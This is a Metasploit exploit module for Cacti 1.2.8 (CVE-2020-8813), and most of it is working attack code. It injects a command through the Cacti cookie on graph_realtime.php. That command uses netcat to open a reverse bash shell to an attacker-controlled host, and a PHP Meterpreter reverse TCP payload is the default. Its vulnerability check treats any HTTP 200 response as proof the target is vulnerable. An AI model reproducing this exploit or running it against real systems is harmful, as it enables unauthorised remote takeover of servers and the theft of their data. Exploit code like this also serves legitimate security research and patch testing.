Share
# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)  
# Date: 2020-02-29  
# Exploit Author: Lucas Amorim (sh286)s  
# CVE: CVE-2020-8813  
# Vendor Homepage: https://cacti.net/  
# Version: v1.2.8  
# Tested on: Linux  
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Cacti v1.2.8 Unauthenticated Remote Code Execution',  
'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to   
execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has   
the graph real-time privilege.},  
'Author' =>  
[  
'Lucas Amorim ' # MSF module  
],  
'License' => MSF_LICENSE,  
'Platform' => 'php',  
'References' =>  
[  
['CVE', '2020-8813']  
],  
'DisclosureDate' => 'Feb 21 2020',  
'Privileged' => true,  
'DefaultOptions' => {  
'PAYLOAD' => 'php/meterpreter/reverse_tcp',  
'SSL' => true,  
},  
'Targets' => [  
['Automatic', {}]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(443),  
OptString.new('RPATH', [ false, "path to cacti", "" ])  
])  
  
deregister_options('VHOST')  
end  
  
def check  
res = send_request_raw(  
'method' => 'GET',  
'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init"  
)  
  
if res && res.code == 200  
return Exploit::CheckCode::Vulnerable  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def send_payload()  
exec_payload=(";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % [datastore['LHOST'], datastore['LPORT']])  
send_request_raw(  
'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init",  
'method' => 'GET',  
'cookie' => "Cacti=#{Rex::Text.uri_encode(exec_payload, mode = 'hex-normal')}"  
)  
end  
  
def exploit  
if check == Exploit::CheckCode::Vulnerable  
print_good("Target seems to be a vulnerable")  
send_payload()  
else  
print_error("Target does not seem to be vulnerable. Will exit now...")  
end  
end  
end